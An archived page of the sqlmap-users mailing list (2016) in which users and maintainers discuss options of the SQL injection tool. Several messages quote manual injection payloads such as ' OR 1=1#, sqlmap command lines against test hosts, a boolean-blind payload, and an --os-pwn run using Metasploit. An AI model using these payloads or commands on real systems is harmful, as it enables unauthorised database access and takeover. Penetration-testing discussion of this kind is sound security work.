sqlmap-users Mailing List for sqlmap (Page 3)
Brought to you by:
inquisb
You can subscribe to this list here.
2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
---|---|---|---|---|---|---|---|---|---|---|---|---|
2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
From: Brandon P. <bpe...@gm...> - 2016-12-04 14:24:30
|
What command and arguments are you using exactly? Sent from a phone > On Dec 4, 2016, at 8:06 AM, Daniele Bianchin <bbi...@gm...> wrote: > > Hi! > I have an issue with sqlmap. > I created my own fake login in order to test blind sql injection but everytime i make a test sqlmap says it isn't exploitable. > I tried to add a suffix, set level to 5, set risk to 3, set not-string option but sqlmap still not work with it. > The login source is: http://pastebin.com/xzKZJNB1 > > I tried to inject some payloads manually such as ' OR 1=1#, ' UNION ALL SELECT NULL;NULL #, etc... and they work. > What should i do? > > Thanks in advance! > > > Daniele. > ------------------------------------------------------------------------------ > Check out the vibrant tech community on one of the world's most > engaging tech sites, SlashDot.org! http://sdm.link/slashdot > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
From: Daniele B. <bbi...@gm...> - 2016-12-04 14:06:09
|
Hi! I have an issue with sqlmap. I created my own fake login in order to test blind sql injection but everytime i make a test sqlmap says it isn't exploitable. I tried to add a suffix, set level to 5, set risk to 3, set not-string option but sqlmap still not work with it. The login source is: http://pastebin.com/xzKZJNB1 I tried to inject some payloads manually such as ' OR 1=1#, ' UNION ALL SELECT NULL;NULL #, etc... and they work. What should i do? Thanks in advance! Daniele. |
From: Gary M. <gar...@gm...> - 2016-11-23 10:31:59
|
From: Ricardo I. d. S. <ri...@gm...> - 2016-08-22 21:54:40
|
Thanks a lot! If there is a doc explaining a little about the sqlmap code structure maybe I can help with this feature. I know a little of python but in this case I think the biggest problem would be find the right part of sqlmap code to include/change. On Fri, Aug 19, 2016 at 6:19 AM, Miroslav Stampar <mir...@gm...> wrote: > Currently there is no way. Will implement it when I catch time > (https://github.com/sqlmapproject/sqlmap/issues/1679). > > Bye > > On Thu, Aug 18, 2016 at 11:35 PM, Ricardo Iramar dos Santos > <ri...@gm...> wrote: >> >> I checked and burp replace feature doesn't have any kind of parameter >> to include a incremental number. :( >> I'll check mitmproxy. >> >> On Thu, Aug 18, 2016 at 4:10 PM, Ricardo Iramar dos Santos >> <ri...@gm...> wrote: >> > Great idea!!! Thanks!!! :) >> > I'll try and let you know the results. >> > >> > On Thu, Aug 18, 2016 at 4:07 PM, Brandon Perry >> > <bpe...@gm...> wrote: >> >> You can write a burp rule that rewrites a specific value that you set >> >> in the SOAP body with an incrementing integer as sqlmap is exploiting the >> >> sqlinjection (it wouldn’t realize the parameter needed to be incremented). >> >> >> >> You can use —proxy to send sqlmap through burp. >> >> >> >>> On Aug 18, 2016, at 2:02 PM, Ricardo Iramar dos Santos >> >>> <ri...@gm...> wrote: >> >>> >> >>> I have a SOAP POST request where two different should be unique. One >> >>> is an Email and another UserID. >> >>> Is there a way to inject on Email having the email domain (e.g. >> >>> @gmail.com) as a suffix and increment the UserID parameter (e.g. >> >>> starting from 100)? >> >>> >> >>> Thanks! >> >>> Ricardo Iramar >> >>> >> >>> >> >>> ------------------------------------------------------------------------------ >> >>> _______________________________________________ >> >>> sqlmap-users mailing list >> >>> sql...@li... >> >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> >> >> ------------------------------------------------------------------------------ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > Miroslav Stampar > http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2016-08-22 12:14:42
|
Hi. One way is a direct approach: python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --cookie="cid=1" --eval='cid=2' -v 5 ... GET /artists.php?artist=1 HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0.8.20#dev (http://sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: testphp.vulnweb.com Cookie: cid=2 Pragma: no-cache Cache-control: no-cache,no-store Connection: close Bye On Fri, Aug 19, 2016 at 5:10 PM, Benjamin Vassmer <bva...@gm...> wrote: > I am trying to run sqlmap against a site that uses single-use URLs. I am > able using the --eval parameter to run a bash script that creates a fresh > cookie for each request, but I cannot seem to find a way to load that > cookie with every request. > > I have tried the --load-cookies parameter, but it only loads at sqlmap > start. Is there a way to direct --load-cookies to a script? Or an alternate > way to change the cookie with each request? > > Thanks for your (cumulative) knowledge. > > Benjamin > > ------------------------------------------------------------ > ------------------ > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
From: Benjamin V. <bva...@gm...> - 2016-08-19 15:10:46
|
I am trying to run sqlmap against a site that uses single-use URLs. I am able using the --eval parameter to run a bash script that creates a fresh cookie for each request, but I cannot seem to find a way to load that cookie with every request. I have tried the --load-cookies parameter, but it only loads at sqlmap start. Is there a way to direct --load-cookies to a script? Or an alternate way to change the cookie with each request? Thanks for your (cumulative) knowledge. Benjamin |
From: Miroslav S. <mir...@gm...> - 2016-08-19 09:19:29
|
Currently there is no way. Will implement it when I catch time ( https://github.com/sqlmapproject/sqlmap/issues/1679). Bye On Thu, Aug 18, 2016 at 11:35 PM, Ricardo Iramar dos Santos < ri...@gm...> wrote: > I checked and burp replace feature doesn't have any kind of parameter > to include a incremental number. :( > I'll check mitmproxy. > > On Thu, Aug 18, 2016 at 4:10 PM, Ricardo Iramar dos Santos > <ri...@gm...> wrote: > > Great idea!!! Thanks!!! :) > > I'll try and let you know the results. > > > > On Thu, Aug 18, 2016 at 4:07 PM, Brandon Perry > > <bpe...@gm...> wrote: > >> You can write a burp rule that rewrites a specific value that you set > in the SOAP body with an incrementing integer as sqlmap is exploiting the > sqlinjection (it wouldn’t realize the parameter needed to be incremented). > >> > >> You can use —proxy to send sqlmap through burp. > >> > >>> On Aug 18, 2016, at 2:02 PM, Ricardo Iramar dos Santos < > ri...@gm...> wrote: > >>> > >>> I have a SOAP POST request where two different should be unique. One > >>> is an Email and another UserID. > >>> Is there a way to inject on Email having the email domain (e.g. > >>> @gmail.com) as a suffix and increment the UserID parameter (e.g. > >>> starting from 100)? > >>> > >>> Thanks! > >>> Ricardo Iramar > >>> > >>> ------------------------------------------------------------ > ------------------ > >>> _______________________________________________ > >>> sqlmap-users mailing list > >>> sql...@li... > >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> > > ------------------------------------------------------------ > ------------------ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
From: Ricardo I. d. S. <ri...@gm...> - 2016-08-18 21:35:12
|
I checked and burp replace feature doesn't have any kind of parameter to include a incremental number. :( I'll check mitmproxy. On Thu, Aug 18, 2016 at 4:10 PM, Ricardo Iramar dos Santos <ri...@gm...> wrote: > Great idea!!! Thanks!!! :) > I'll try and let you know the results. > > On Thu, Aug 18, 2016 at 4:07 PM, Brandon Perry > <bpe...@gm...> wrote: >> You can write a burp rule that rewrites a specific value that you set in the SOAP body with an incrementing integer as sqlmap is exploiting the sqlinjection (it wouldn’t realize the parameter needed to be incremented). >> >> You can use —proxy to send sqlmap through burp. >> >>> On Aug 18, 2016, at 2:02 PM, Ricardo Iramar dos Santos <ri...@gm...> wrote: >>> >>> I have a SOAP POST request where two different should be unique. One >>> is an Email and another UserID. >>> Is there a way to inject on Email having the email domain (e.g. >>> @gmail.com) as a suffix and increment the UserID parameter (e.g. >>> starting from 100)? >>> >>> Thanks! >>> Ricardo Iramar >>> >>> ------------------------------------------------------------------------------ >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> |
From: Ricardo I. d. S. <ri...@gm...> - 2016-08-18 19:10:45
|
Great idea!!! Thanks!!! :) I'll try and let you know the results. On Thu, Aug 18, 2016 at 4:07 PM, Brandon Perry <bpe...@gm...> wrote: > You can write a burp rule that rewrites a specific value that you set in the SOAP body with an incrementing integer as sqlmap is exploiting the sqlinjection (it wouldn’t realize the parameter needed to be incremented). > > You can use —proxy to send sqlmap through burp. > >> On Aug 18, 2016, at 2:02 PM, Ricardo Iramar dos Santos <ri...@gm...> wrote: >> >> I have a SOAP POST request where two different should be unique. One >> is an Email and another UserID. >> Is there a way to inject on Email having the email domain (e.g. >> @gmail.com) as a suffix and increment the UserID parameter (e.g. >> starting from 100)? >> >> Thanks! >> Ricardo Iramar >> >> ------------------------------------------------------------------------------ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
From: Brandon P. <bpe...@gm...> - 2016-08-18 19:07:55
|
You can write a burp rule that rewrites a specific value that you set in the SOAP body with an incrementing integer as sqlmap is exploiting the sqlinjection (it wouldn’t realize the parameter needed to be incremented). You can use —proxy to send sqlmap through burp. > On Aug 18, 2016, at 2:02 PM, Ricardo Iramar dos Santos <ri...@gm...> wrote: > > I have a SOAP POST request where two different should be unique. One > is an Email and another UserID. > Is there a way to inject on Email having the email domain (e.g. > @gmail.com) as a suffix and increment the UserID parameter (e.g. > starting from 100)? > > Thanks! > Ricardo Iramar > > ------------------------------------------------------------------------------ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
From: Ricardo I. d. S. <ri...@gm...> - 2016-08-18 19:02:20
|
I have a SOAP POST request where two different should be unique. One is an Email and another UserID. Is there a way to inject on Email having the email domain (e.g. @gmail.com) as a suffix and increment the UserID parameter (e.g. starting from 100)? Thanks! Ricardo Iramar |
From: Miroslav S. <mir...@gm...> - 2016-08-05 08:02:50
|
Is there any specific question that is preceding? Currently there is no way to declare explicitly what you want. Bye On Aug 4, 2016 03:25, "Indra Zulkarnain" <net...@gm...> wrote: > hi guys > > is there a way to abort sqli attack on sqlmap after the third error > > i used to keep sqlmap running in the server to dump database when the vuln > is sqli time based > but i want the sqlmap to stop retrying after the third error > > thanks > Indra Z > > > ------------------------------------------------------------------------------ > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
From: Indra Z. <net...@gm...> - 2016-08-04 10:24:36
|
hi guys is there a way to abort sqli attack on sqlmap after the third error i used to keep sqlmap running in the server to dump database when the vuln is sqli time based but i want the sqlmap to stop retrying after the third error thanks Indra Z |
From: Miroslav S. <mir...@gm...> - 2016-08-01 11:00:24
|
Hi. This looks like a false positive. Please rerun with --flush-session. Kind regards On Mon, Aug 1, 2016 at 12:57 PM, Niall <jam...@gm...> wrote: > Hi, > > I am using SQLMAP to pen test a web app and it says that a field is > boolean based blind vunerable. > > The DB is an OpenEdge Progress DB, so I understand SQLMAP does not support > this DBMS. However, can I still use it to test whether there is a SQL > injection vulnerability (and not exploit it) or will it not detect the > vulnerability at all? > > I am not sure whether SQLMAP cannot get any info out of the DB because > Progress is unsupported or it is a false-positive. > > Below is SQLMAP output (If I run the exact same query on the DB itself it > returns data): > > sqlmap -u 'http://xxx/login?host=1' --sql-query="select ('role') from > pub.role_type" --no-cast --threads=2 > _ > ___ ___| |_____ ___ ___ {1.0.7.1#dev} > |_ -| . | | | .'| . | > |___|_ |_|_|_|_|__,| _| > |_| |_| http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior > mutual consent is illegal. It is the end user's responsibility to obey all > applicable local, state and federal laws. Developers assume no liability > and are not responsible for any misuse or damage caused by this program > > [*] starting at 11:53:57 > > [11:53:57] [INFO] resuming back-end DBMS 'mysql' > [11:53:57] [INFO] testing connection to the target URL > [11:53:57] [CRITICAL] previous heuristics detected that the target is > protected by some kind of WAF/IPS/IDS > sqlmap resumed the following injection point(s) from stored session: > --- > Parameter: host (GET) > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: host=1") AND 1239=1239 AND ("UqXp"="UqXp > --- > [11:53:57] [INFO] the back-end DBMS is MySQL > back-end DBMS: MySQL 5 (MariaDB fork) > [11:53:57] [INFO] fetching SQL SELECT statement query output: 'select > ('role') from pub.role_type' > [11:53:57] [INFO] retrieving the length of query output > [11:53:57] [INFO] retrieved: > [11:53:57] [INFO] retrieved: > select ('role') from pub.role_type: None > [11:53:58] [INFO] fetched data logged to text files under > '/root/.sqlmap/output/' > > [*] shutting down at 11:53:58 > > > Thank you for your help. > > > > ------------------------------------------------------------------------------ > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
From: Niall <jam...@gm...> - 2016-08-01 10:57:57
|
Hi, I am using SQLMAP to pen test a web app and it says that a field is boolean based blind vunerable. The DB is an OpenEdge Progress DB, so I understand SQLMAP does not support this DBMS. However, can I still use it to test whether there is a SQL injection vulnerability (and not exploit it) or will it not detect the vulnerability at all? I am not sure whether SQLMAP cannot get any info out of the DB because Progress is unsupported or it is a false-positive. Below is SQLMAP output (If I run the exact same query on the DB itself it returns data): sqlmap -u 'http://xxx/login?host=1' --sql-query="select ('role') from pub.role_type" --no-cast --threads=2 _ ___ ___| |_____ ___ ___ {1.0.7.1#dev} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 11:53:57 [11:53:57] [INFO] resuming back-end DBMS 'mysql' [11:53:57] [INFO] testing connection to the target URL [11:53:57] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS sqlmap resumed the following injection point(s) from stored session: --- Parameter: host (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: host=1") AND 1239=1239 AND ("UqXp"="UqXp --- [11:53:57] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 5 (MariaDB fork) [11:53:57] [INFO] fetching SQL SELECT statement query output: 'select ('role') from pub.role_type' [11:53:57] [INFO] retrieving the length of query output [11:53:57] [INFO] retrieved: [11:53:57] [INFO] retrieved: select ('role') from pub.role_type: None [11:53:58] [INFO] fetched data logged to text files under '/root/.sqlmap/output/' [*] shutting down at 11:53:58 Thank you for your help. |
From: armen R. <arm...@ya...> - 2016-04-26 01:50:52
|
hi bro i cand run my pc python sqlmap.py so pls helpe me now |
From: Miroslav S. <mir...@gm...> - 2016-04-23 14:43:55
|
Changed wiki pages for --string to: ...which should be present on original page (though it is not a requirement)... Bye On Sat, Apr 23, 2016 at 4:40 PM, Miroslav Stampar < mir...@gm...> wrote: > Just checked. > > sqlmap only warns that there is no --string in original response. So, I > just need to change the wiki pages accordingly > > Bye > > On Fri, Apr 22, 2016 at 5:43 PM, Miroslav Stampar < > mir...@gm...> wrote: > >> p.s. "Will check current status now" -> "Will check current status later >> today" >> On Apr 22, 2016 5:42 PM, "Miroslav Stampar" <mir...@gm...> >> wrote: >> >>> Ok. This makes way more sense :). Now commuting. Will check current >>> status now (will drop checking in original if it is the case now). >>> >>> Bye >>> On Apr 22, 2016 5:39 PM, "Tim Maletic" <tma...@gm...> wrote: >>> >>>> Let me try to put this another way. According to the usage doc: >>>> >>>> "Sometimes it may fail, that is why the user can provide a string >>>> (--string option) which is always present on original page and on all True >>>> injected query pages, but that it is not on the False ones." >>>> >>>> Is there a way to invert this logic so that "--string" works for >>>> strings that are present on original page and all *true* ones? >>>> >>>> On Fri, Apr 22, 2016 at 11:20 AM, Miroslav Stampar < >>>> mir...@gm...> wrote: >>>> >>>>> This doesn't make any sense. With --string either there is a string >>>>> (TRUE) or there isn't (FALSE). In case of --not-string it's the complete >>>>> opposite. >>>>> >>>>> You are asking for 4 states: 1) with string and not-string; 2) with >>>>> string and no not-string; 3) without string and with not-string; and 4) >>>>> without string and without not-string >>>>> >>>>> Please reconsider your whole use-case. >>>>> >>>>> Bye >>>>> >>>>> On Fri, Apr 22, 2016 at 4:23 PM, Tim Maletic <tma...@gm...> >>>>> wrote: >>>>> >>>>>> I'm testing a system where no injection and false injections produce >>>>>> page A, but true injections produce page B. >>>>>> >>>>>> sqlmap doesn't support setting both --string and --not-string, and >>>>>> these options assume the opposite of the above, so I don't see a way to >>>>>> handle this unusual situation. >>>>>> >>>>>> Suggestions? >>>>>> Thanks! >>>>>> -tm >>>>>> >>>>>> >>>>>> ------------------------------------------------------------------------------ >>>>>> Find and fix application performance issues faster with Applications >>>>>> Manager >>>>>> Applications Manager provides deep performance insights into multiple >>>>>> tiers of >>>>>> your business applications. It resolves application problems quickly >>>>>> and >>>>>> reduces your MTTR. Get your free trial! >>>>>> https://ad.doubleclick.net/ddm/clk/302982198;130105516;z >>>>>> _______________________________________________ >>>>>> sqlmap-users mailing list >>>>>> sql...@li... >>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>> >>>>>> >>>>> >>>>> >>>>> -- >>>>> Miroslav Stampar >>>>> http://about.me/stamparm >>>>> >>>> >>>> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2016-04-23 14:40:30
|
Just checked. sqlmap only warns that there is no --string in original response. So, I just need to change the wiki pages accordingly Bye On Fri, Apr 22, 2016 at 5:43 PM, Miroslav Stampar < mir...@gm...> wrote: > p.s. "Will check current status now" -> "Will check current status later > today" > On Apr 22, 2016 5:42 PM, "Miroslav Stampar" <mir...@gm...> > wrote: > >> Ok. This makes way more sense :). Now commuting. Will check current >> status now (will drop checking in original if it is the case now). >> >> Bye >> On Apr 22, 2016 5:39 PM, "Tim Maletic" <tma...@gm...> wrote: >> >>> Let me try to put this another way. According to the usage doc: >>> >>> "Sometimes it may fail, that is why the user can provide a string >>> (--string option) which is always present on original page and on all True >>> injected query pages, but that it is not on the False ones." >>> >>> Is there a way to invert this logic so that "--string" works for strings >>> that are present on original page and all *true* ones? >>> >>> On Fri, Apr 22, 2016 at 11:20 AM, Miroslav Stampar < >>> mir...@gm...> wrote: >>> >>>> This doesn't make any sense. With --string either there is a string >>>> (TRUE) or there isn't (FALSE). In case of --not-string it's the complete >>>> opposite. >>>> >>>> You are asking for 4 states: 1) with string and not-string; 2) with >>>> string and no not-string; 3) without string and with not-string; and 4) >>>> without string and without not-string >>>> >>>> Please reconsider your whole use-case. >>>> >>>> Bye >>>> >>>> On Fri, Apr 22, 2016 at 4:23 PM, Tim Maletic <tma...@gm...> >>>> wrote: >>>> >>>>> I'm testing a system where no injection and false injections produce >>>>> page A, but true injections produce page B. >>>>> >>>>> sqlmap doesn't support setting both --string and --not-string, and >>>>> these options assume the opposite of the above, so I don't see a way to >>>>> handle this unusual situation. >>>>> >>>>> Suggestions? >>>>> Thanks! >>>>> -tm >>>>> >>>>> >>>>> ------------------------------------------------------------------------------ >>>>> Find and fix application performance issues faster with Applications >>>>> Manager >>>>> Applications Manager provides deep performance insights into multiple >>>>> tiers of >>>>> your business applications. It resolves application problems quickly >>>>> and >>>>> reduces your MTTR. Get your free trial! >>>>> https://ad.doubleclick.net/ddm/clk/302982198;130105516;z >>>>> _______________________________________________ >>>>> sqlmap-users mailing list >>>>> sql...@li... >>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>> >>>>> >>>> >>>> >>>> -- >>>> Miroslav Stampar >>>> http://about.me/stamparm >>>> >>> >>> -- Miroslav Stampar http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2016-04-22 15:43:50
|
p.s. "Will check current status now" -> "Will check current status later today" On Apr 22, 2016 5:42 PM, "Miroslav Stampar" <mir...@gm...> wrote: > Ok. This makes way more sense :). Now commuting. Will check current status > now (will drop checking in original if it is the case now). > > Bye > On Apr 22, 2016 5:39 PM, "Tim Maletic" <tma...@gm...> wrote: > >> Let me try to put this another way. According to the usage doc: >> >> "Sometimes it may fail, that is why the user can provide a string >> (--string option) which is always present on original page and on all True >> injected query pages, but that it is not on the False ones." >> >> Is there a way to invert this logic so that "--string" works for strings >> that are present on original page and all *true* ones? >> >> On Fri, Apr 22, 2016 at 11:20 AM, Miroslav Stampar < >> mir...@gm...> wrote: >> >>> This doesn't make any sense. With --string either there is a string >>> (TRUE) or there isn't (FALSE). In case of --not-string it's the complete >>> opposite. >>> >>> You are asking for 4 states: 1) with string and not-string; 2) with >>> string and no not-string; 3) without string and with not-string; and 4) >>> without string and without not-string >>> >>> Please reconsider your whole use-case. >>> >>> Bye >>> >>> On Fri, Apr 22, 2016 at 4:23 PM, Tim Maletic <tma...@gm...> wrote: >>> >>>> I'm testing a system where no injection and false injections produce >>>> page A, but true injections produce page B. >>>> >>>> sqlmap doesn't support setting both --string and --not-string, and >>>> these options assume the opposite of the above, so I don't see a way to >>>> handle this unusual situation. >>>> >>>> Suggestions? >>>> Thanks! >>>> -tm >>>> >>>> >>>> ------------------------------------------------------------------------------ >>>> Find and fix application performance issues faster with Applications >>>> Manager >>>> Applications Manager provides deep performance insights into multiple >>>> tiers of >>>> your business applications. It resolves application problems quickly and >>>> reduces your MTTR. Get your free trial! >>>> https://ad.doubleclick.net/ddm/clk/302982198;130105516;z >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>> >>>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >>> >> >> |
From: Miroslav S. <mir...@gm...> - 2016-04-22 15:42:32
|
Ok. This makes way more sense :). Now commuting. Will check current status now (will drop checking in original if it is the case now). Bye On Apr 22, 2016 5:39 PM, "Tim Maletic" <tma...@gm...> wrote: > Let me try to put this another way. According to the usage doc: > > "Sometimes it may fail, that is why the user can provide a string > (--string option) which is always present on original page and on all True > injected query pages, but that it is not on the False ones." > > Is there a way to invert this logic so that "--string" works for strings > that are present on original page and all *true* ones? > > On Fri, Apr 22, 2016 at 11:20 AM, Miroslav Stampar < > mir...@gm...> wrote: > >> This doesn't make any sense. With --string either there is a string >> (TRUE) or there isn't (FALSE). In case of --not-string it's the complete >> opposite. >> >> You are asking for 4 states: 1) with string and not-string; 2) with >> string and no not-string; 3) without string and with not-string; and 4) >> without string and without not-string >> >> Please reconsider your whole use-case. >> >> Bye >> >> On Fri, Apr 22, 2016 at 4:23 PM, Tim Maletic <tma...@gm...> wrote: >> >>> I'm testing a system where no injection and false injections produce >>> page A, but true injections produce page B. >>> >>> sqlmap doesn't support setting both --string and --not-string, and these >>> options assume the opposite of the above, so I don't see a way to handle >>> this unusual situation. >>> >>> Suggestions? >>> Thanks! >>> -tm >>> >>> >>> ------------------------------------------------------------------------------ >>> Find and fix application performance issues faster with Applications >>> Manager >>> Applications Manager provides deep performance insights into multiple >>> tiers of >>> your business applications. It resolves application problems quickly and >>> reduces your MTTR. Get your free trial! >>> https://ad.doubleclick.net/ddm/clk/302982198;130105516;z >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> > > |
From: Tim M. <tma...@gm...> - 2016-04-22 15:39:18
|
Let me try to put this another way. According to the usage doc: "Sometimes it may fail, that is why the user can provide a string (--string option) which is always present on original page and on all True injected query pages, but that it is not on the False ones." Is there a way to invert this logic so that "--string" works for strings that are present on original page and all *true* ones? On Fri, Apr 22, 2016 at 11:20 AM, Miroslav Stampar < mir...@gm...> wrote: > This doesn't make any sense. With --string either there is a string (TRUE) > or there isn't (FALSE). In case of --not-string it's the complete opposite. > > You are asking for 4 states: 1) with string and not-string; 2) with string > and no not-string; 3) without string and with not-string; and 4) without > string and without not-string > > Please reconsider your whole use-case. > > Bye > > On Fri, Apr 22, 2016 at 4:23 PM, Tim Maletic <tma...@gm...> wrote: > >> I'm testing a system where no injection and false injections produce page >> A, but true injections produce page B. >> >> sqlmap doesn't support setting both --string and --not-string, and these >> options assume the opposite of the above, so I don't see a way to handle >> this unusual situation. >> >> Suggestions? >> Thanks! >> -tm >> >> >> ------------------------------------------------------------------------------ >> Find and fix application performance issues faster with Applications >> Manager >> Applications Manager provides deep performance insights into multiple >> tiers of >> your business applications. It resolves application problems quickly and >> reduces your MTTR. Get your free trial! >> https://ad.doubleclick.net/ddm/clk/302982198;130105516;z >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > |
From: Miroslav S. <mir...@gm...> - 2016-04-22 15:21:03
|
This doesn't make any sense. With --string either there is a string (TRUE) or there isn't (FALSE). In case of --not-string it's the complete opposite. You are asking for 4 states: 1) with string and not-string; 2) with string and no not-string; 3) without string and with not-string; and 4) without string and without not-string Please reconsider your whole use-case. Bye On Fri, Apr 22, 2016 at 4:23 PM, Tim Maletic <tma...@gm...> wrote: > I'm testing a system where no injection and false injections produce page > A, but true injections produce page B. > > sqlmap doesn't support setting both --string and --not-string, and these > options assume the opposite of the above, so I don't see a way to handle > this unusual situation. > > Suggestions? > Thanks! > -tm > > > ------------------------------------------------------------------------------ > Find and fix application performance issues faster with Applications > Manager > Applications Manager provides deep performance insights into multiple > tiers of > your business applications. It resolves application problems quickly and > reduces your MTTR. Get your free trial! > https://ad.doubleclick.net/ddm/clk/302982198;130105516;z > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
From: Tim M. <tma...@gm...> - 2016-04-22 14:23:33
|
I'm testing a system where no injection and false injections produce page A, but true injections produce page B. sqlmap doesn't support setting both --string and --not-string, and these options assume the opposite of the above, so I don't see a way to handle this unusual situation. Suggestions? Thanks! -tm |
From: Miroslav S. <mir...@gm...> - 2016-04-22 07:17:15
|
In your case, problem is the --tmp-path. Have you manually set it to "/tmp"? If so, it is wrongly set to a linux path while you should put it to a remote (Windows) location (...--tmp-path=TMPPATH Remote absolute path of temporary files directory) Bye On Fri, Apr 22, 2016 at 9:13 AM, Miroslav Stampar < mir...@gm...> wrote: > $ sudo python sqlmap.py -u " > http://192.168.146.132/test_environment/mysql/get_int.php?id=1" --os-pwn > [sudo] password for stamparm: > _ > ___ ___| |_____ ___ ___ {1.0.4.21#dev} > |_ -| . | | | .'| . | > |___|_ |_|_|_|_|__,| _| > |_| |_| http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior > mutual consent is illegal. It is the end user's responsibility to obey all > applicable local, state and federal laws. Developers assume no liability > and are not responsible for any misuse or damage caused by this program > > [*] starting at 09:11:45 > > [09:11:45] [WARNING] you did not provide the local path where Metasploit > Framework is installed > [09:11:45] [WARNING] sqlmap is going to look for Metasploit Framework > installation inside the environment path(s) > [09:11:45] [INFO] Metasploit Framework has been found installed in the > '/usr/bin' path > [09:11:45] [INFO] resuming back-end DBMS 'mysql' > [09:11:45] [INFO] testing connection to the target URL > [09:11:45] [INFO] heuristics detected web page charset 'ascii' > [09:11:45] [WARNING] there is a DBMS error found in the HTTP response body > which could interfere with the results of the tests > 